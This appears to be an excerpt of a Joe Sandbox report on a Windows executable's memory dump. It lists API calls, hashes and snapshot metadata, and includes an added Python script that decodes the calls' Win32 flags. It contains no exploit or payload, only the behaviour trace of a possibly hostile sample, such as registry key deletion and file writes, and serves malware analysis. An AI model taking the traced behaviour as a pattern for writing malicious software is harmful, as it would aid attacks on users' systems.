• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateMessageProcess
• String ID: error
• API String ID: 2992861138-1574812785
• Opcode ID: d3882239744023b33d44da9ab199a84a29a20a27f39183c734b168b615eadf13
• Instruction ID: 8a6f1b0fd2e26a177ced3a624d2d5e3583a7a4520407ac1e3a69f2c73f047605
• Opcode Fuzzy Hash: d3882239744023b33d44da9ab199a84a29a20a27f39183c734b168b615eadf13
• Instruction Fuzzy Hash: 3FE0D875A40311BFD7225F64BC59F073B5CAB04B6CF05002DF806E6691EA649C10875A
                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 004CCBE0
                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,80000004,00000000,00000000,00000000), ref: 004CCC26
                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,80000004,00000000,00000000), ref: 004CCC5B
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,80000004,00000000,00000000,00000000), ref: 004CCC97
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: QueryValue$CloseOpen
                                                                • String ID:
                                                                • API String ID: 1586453840-0
                                                                • Opcode ID: 32b76f72a0b9bb12ce1989b296d87482098ebf863adc7963c3aa1277427bc4be
                                                                • Instruction ID: 77f2072394603a79bbd806cbcc9b384335e57fb382f6222d9fcf9a9c1bf79407
                                                                • Opcode Fuzzy Hash: 32b76f72a0b9bb12ce1989b296d87482098ebf863adc7963c3aa1277427bc4be
                                                                • Instruction Fuzzy Hash: F241E4752002015BE354DA799C95E6B77D8EFC1324F140A2FF919C7382EA69DC0583AA
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                                • String ID:
                                                                • API String ID: 4182129353-0
                                                                • Opcode ID: 98814c00e7e5b65e1b8524d47a8fdd61d168a32b78bd92914a392997cdf756a1
                                                                • Instruction ID: 5452d87f978f26a63625f9b0f53007fc5897ef72018dfa6d18b148897fce0334
                                                                • Opcode Fuzzy Hash: 98814c00e7e5b65e1b8524d47a8fdd61d168a32b78bd92914a392997cdf756a1
                                                                • Instruction Fuzzy Hash: D341D371500B025FD7399F28E885A7E7FA8BFC5320B14C61DE8AE8B6D1D734D840AB52
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37394a9f8b2a5cdc50024c82add3837a93a14a009a146b521223be1b8a3ede6b
                                                                • Instruction ID: 8e1ab2913389e50859e008fe528e8853b84cd408bc30a5da99d162cd88535edc
                                                                • Opcode Fuzzy Hash: 37394a9f8b2a5cdc50024c82add3837a93a14a009a146b521223be1b8a3ede6b
                                                                • Instruction Fuzzy Hash: CF418DB96042018FD715DF09E84069AB7E5FFCD321F8445AFD88487361E7B9984ACB62
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,000F003F,?,?,?,000006A8,00000000,80000004), ref: 0042E509
                                                                • RegDeleteValueA.ADVAPI32(?,00000000,?,?,000006A8,00000000,80000004,?,?,?,?,?,?,?,00427B99,?), ref: 0042E519
                                                                • RegCloseKey.ADVAPI32(?,?,?,000006A8,00000000,80000004,?,?,?,?,?,?,?,00427B99,?), ref: 0042E52B
                                                                • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042E53B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$CloseOpenValue
                                                                • String ID:
                                                                • API String ID: 2185037004-0
                                                                • Opcode ID: 759c0e6658bbf6ac46b4d28220de9b3f2ab3691e8da31b8d6083ecb03489bb80
                                                                • Instruction ID: 342278fc7a7a4cde7e79c63a7acb2ec0288ea3c5b16def7e677433d138efb5fc
                                                                • Opcode Fuzzy Hash: 759c0e6658bbf6ac46b4d28220de9b3f2ab3691e8da31b8d6083ecb03489bb80
                                                                • Instruction Fuzzy Hash: CC1105727042742BD234AAB6AC45F3B778CEB846B5F04072EFD46D7381DA28DC0182E8
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000,80000005), ref: 0042E228
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,0000026C,?,00000000,80000005), ref: 0042E267
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 0042E27A
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 0042E295
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateWrite
                                                                • String ID:
                                                                • API String ID: 3602564925-0
                                                                • Opcode ID: 13a3b1472709f83eaa751b6af4817dd761e320891984dbea1e6e145f61f50184
                                                                • Instruction ID: d2488141c9ba4019a1cb3b512ed645dc8158cad692f90bd4fa358afa0a6a3d76
                                                                • Opcode Fuzzy Hash: 13a3b1472709f83eaa751b6af4817dd761e320891984dbea1e6e145f61f50184
                                                                • Instruction Fuzzy Hash: 0A117C32304342ABD710DF58ECC5F6AB3E8FB84724F54096AFA5597281D374E809876A
                                                                APIs
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000050,?,00000000), ref: 004D457C
                                                                • RtlAllocateHeap.NTDLL(00000008,000041C4,?), ref: 004D45B0
                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004D45CA
                                                                • HeapFree.KERNEL32(00000000,?), ref: 004D45E1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$Allocate$AllocFreeVirtual
                                                                • String ID:
                                                                • API String ID: 94566200-0
                                                                • Opcode ID: e4d2d697c5f36891b602c329ca882eb83c8cc0b9583e54b2f8db77c091f3dd81
                                                                • Instruction ID: a69f35a7f1a0382f33856beed9f63c1ef6beecd9f9bbb19d849be5f8af7ba7ea
                                                                • Opcode Fuzzy Hash: e4d2d697c5f36891b602c329ca882eb83c8cc0b9583e54b2f8db77c091f3dd81
                                                                • Instruction Fuzzy Hash: A6116A70240601EFCB21AF18EC959267BB6FB963207186A2EF252C72F1C331B945CF15
                                                                APIs
                                                                • CreateFileA.KERNEL32(0044C863,80000000,00000003,00000000,00000003,00000020,00000000,00000000,0044C863,00000001,00000000,00000000,80000004), ref: 004CC385
                                                                • GetFileSize.KERNEL32(00000000,?,004FEE96,00000268), ref: 004CC39C
                                                                  • Part of subcall function 004CA190: GetProcessHeap.KERNEL32(004CA418,00000001,?,80000301,00000000), ref: 004CA199
                                                                  • Part of subcall function 004CA190: RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 004CA1AD
                                                                  • Part of subcall function 004CA190: MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA1C6
                                                                • ReadFile.KERNEL32(00000000,00000008,00000000,?,00000000), ref: 004CC3C8
                                                                • CloseHandle.KERNEL32(00000000), ref: 004CC3CF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Heap$AllocateCloseCreateHandleMessageProcessReadSize
                                                                • String ID:
                                                                • API String ID: 749537981-0
                                                                • Opcode ID: 5f05dea00fa0cae425c06bf5ca14a4f679cfa2bbec402f25a2298a1d3765780f
                                                                • Instruction ID: 424bbcaab471c7c580d975ec2572d64688d953248b2ce2ab3da943a2483f3f47
                                                                • Opcode Fuzzy Hash: 5f05dea00fa0cae425c06bf5ca14a4f679cfa2bbec402f25a2298a1d3765780f
                                                                • Instruction Fuzzy Hash: 11F044762043407BE3219B64ECC9F9B77ACDB88B20F104A2DF646DB1D1E6B4A944C765
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(006B94F8,00000001), ref: 004E68E8
                                                                • RtlInitializeCriticalSection.NTDLL(006B94E0), ref: 004E68F3
                                                                • RtlEnterCriticalSection.NTDLL(006B94E0), ref: 004E6932
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                                                • String ID:
                                                                • API String ID: 3643093385-0
                                                                • Opcode ID: 41340a1d93cae58c93d7e65189a0b917079dc2c6c478393448de41259a635a48
                                                                • Instruction ID: 12fe3ff945257e14508f4ceda8883418fd77f1456e222826719264046e4c5a32
                                                                • Opcode Fuzzy Hash: 41340a1d93cae58c93d7e65189a0b917079dc2c6c478393448de41259a635a48
                                                                • Instruction Fuzzy Hash: 61F081F1684381AAC7215B566CC5BA63795E3B07F7F23013BF22689363D57848C28739
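                                                                 The "APIs" lists in the function records above (the RegOpenKeyExA/RegDeleteValueA/RegDeleteKeyA sequence at 0042E509, the CreateFileA/WriteFile pair at 0042E228, the CreateFileA/ReadFile pair at 004CC385, the VirtualAlloc at 004D45CA, the critical-section initialisation at 004E68E8) print every argument as a raw hex stack slot, so access masks, creation dispositions and allocation flags have to be decoded by hand to see that, for instance, the write path opens its target with GENERIC_WRITE and CREATE_ALWAYS while the read path uses GENERIC_READ and OPEN_EXISTING. The Python below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses lines in exactly this listing format and decodes the documented Win32 flag arguments for the handful of APIs seen here. It assumes that the sandbox prints more stack slots than the API's arity and that only the first N slots are real arguments (the rest is stack residue), and its prototype table is hand-written for these APIs only; the sample input is copied from the records on this page.

```python
"""Parse Joe Sandbox per-function "APIs" listings and decode known Win32 flag arguments."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied verbatim from the function records on this page.
SAMPLE = """\
• RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,000F003F,?,?,?,000006A8,00000000,80000004), ref: 0042E509
• RegDeleteValueA.ADVAPI32(?,00000000,?,?,000006A8,00000000,80000004,?,?,?,?,?,?,?,00427B99,?), ref: 0042E519
• RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042E53B
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000,80000005), ref: 0042E228
• CreateFileA.KERNEL32(0044C863,80000000,00000003,00000000,00000003,00000020,00000000,00000000,0044C863,00000001,00000000,00000000,80000004), ref: 004CC385
  • Part of subcall function 004CA190: GetProcessHeap.KERNEL32(004CA418,00000001,?,80000301,00000000), ref: 004CA199
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004D45CA
• RtlInitializeCriticalSection.NTDLL ref: 004E06BF
"""

# One listing line: optional "Part of subcall function X:" prefix, Api.Module, optional
# "(slot,slot,...)" argument list, then "ref: <address>". Slots are hex or "?" (unresolved).
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 constants used by the decoders below.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
             0x4: "FILE_ATTRIBUTE_SYSTEM", 0x20: "FILE_ATTRIBUTE_ARCHIVE",
             0x80: "FILE_ATTRIBUTE_NORMAL"}
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
              0x80000: "WRITE_OWNER"}
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN"}
PAGE = {0x1: "PAGE_NOACCESS", 0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def bits(value, table):
    """Name every set bit found in table; any unknown remainder stays as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest or not names:
        names.append(hex(rest))
    return "|".join(names)


def enum(value, table):
    return table.get(value, hex(value))


# (parameter name, decoder) per documented prototype. The trace prints more stack slots
# than the arity (assumption: the extra slots are stack residue), so only the first
# len(prototype) slots are treated as arguments.
PROTOTYPES = {
    "CreateFileA": [("lpFileName", None), ("dwDesiredAccess", lambda v: bits(v, GENERIC)),
                    ("dwShareMode", lambda v: bits(v, SHARE)), ("lpSecurityAttributes", None),
                    ("dwCreationDisposition", lambda v: enum(v, DISPOSITION)),
                    ("dwFlagsAndAttributes", lambda v: bits(v, FILE_ATTR)), ("hTemplateFile", None)],
    "RegOpenKeyExA": [("hKey", None), ("lpSubKey", None), ("ulOptions", None),
                      ("samDesired", lambda v: "KEY_ALL_ACCESS" if v == 0xF003F else bits(v, KEY_RIGHTS)),
                      ("phkResult", None)],
    "VirtualAlloc": [("lpAddress", None), ("dwSize", None),
                     ("flAllocationType", lambda v: bits(v, MEM)), ("flProtect", lambda v: bits(v, PAGE))],
    "RegDeleteValueA": [("hKey", None), ("lpValueName", None)],
    "RegDeleteKeyA": [("hKey", None), ("lpSubKey", None)],
    "GetProcessHeap": [],
    "RtlInitializeCriticalSection": [("lpCriticalSection", None)],
}


@dataclass
class Call:
    api: str
    module: str
    ref: int                    # address of the call site inside the dumped image
    subcall_of: Optional[int]   # set when the line was a "Part of subcall function" entry
    args: list                  # raw slots as printed, "?" where the sandbox could not resolve a value
    decoded: dict               # parameter name -> decoded text, only for APIs in PROTOTYPES


def parse(text):
    """Return one Call per recognised listing line, in file order; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        slots = raw.split(",") if raw else []
        decoded = {}
        for (name, dec), slot in zip(PROTOTYPES.get(m.group("api"), []), slots):
            if slot == "?":
                decoded[name] = "?"
            else:
                value = int(slot, 16)
                decoded[name] = dec(value) if dec else hex(value)
        calls.append(Call(m.group("api"), m.group("mod"), int(m.group("ref"), 16),
                          int(m.group("sub"), 16) if m.group("sub") else None, slots, decoded))
    return calls


if __name__ == "__main__":
    for c in parse(SAMPLE):
        print(f"{c.ref:08X} {c.api}.{c.module} {c.decoded}")
```

Running the block on the embedded sample shows the two CreateFileA calls decoded to GENERIC_WRITE/CREATE_ALWAYS/FILE_ATTRIBUTE_ARCHIVE and GENERIC_READ/FILE_SHARE_READ|FILE_SHARE_WRITE/OPEN_EXISTING respectively, the RegOpenKeyExA as KEY_ALL_ACCESS, and the VirtualAlloc as MEM_RESERVE with PAGE_READWRITE; unresolved slots stay "?" and APIs without a prototype entry get no decoding rather than a guess.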
APIs
• RtlInitializeCriticalSection.NTDLL ref: 004E06BF
• RtlInitializeCriticalSection.NTDLL ref: 004E06C7
• RtlInitializeCriticalSection.NTDLL ref: 004E06CF
• RtlInitializeCriticalSection.NTDLL ref: 004E06D7
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection
• String ID:
• API String ID: 32694325-0
• Opcode ID: 0d4f6560271d9faa2fe0ca59a2384c62544e68ac05161767a74af0ad5c25b54c
• Instruction ID: e6a6bd8d0d9af5aae6614e1b611e23f9338d8e699002c09538a64da2bd39cd8b
• Opcode Fuzzy Hash: 0d4f6560271d9faa2fe0ca59a2384c62544e68ac05161767a74af0ad5c25b54c
